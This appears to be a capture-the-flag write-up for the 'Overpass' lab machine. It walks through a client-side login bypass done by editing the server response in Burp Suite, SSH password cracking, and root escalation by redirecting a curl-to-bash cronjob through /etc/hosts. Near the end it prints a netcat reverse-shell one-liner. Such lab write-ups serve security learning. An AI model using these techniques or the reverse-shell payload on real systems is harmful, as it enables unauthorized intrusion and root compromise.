Overpass
Port Scan
Directory Scan
Web Exploitation
After seeing all the directories,
/admin
was most intresting to meLooking at the source code I found some intresting
.js
files
login.js
This piece of code has an vulnerability, it checks the response of the browser and if it doesn't incorrect credentials, it redirect us to the
/admin
page
get admin privilege
Intercept login request with burp suite and change the response to get the admin panel
Right-click on the request and >
Do intercept > Request to this response
This is the response we get
Updated response
Admin homepage
User Shell
we got username from the admin panel, I've used John to crack the SSH password
We successfully got a shell
Root shell
I've used python server to get
linpeas
into the machine
We have permission to write in
/etc/hosts
There's a cronjob running on root service which basicallay uses curl and pipe it into bash
We are going to change the content of
/etc/hosts
, adding our ip asoverpass.thm
First create files in your localhost
Add a payload in
buildscript.sh
Add your ip and port
[ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc (IP) (PORT) >/tmp/f ]
Start a python3 server
Start netcat listener
Wait around 1 minute to get root shell
Last updated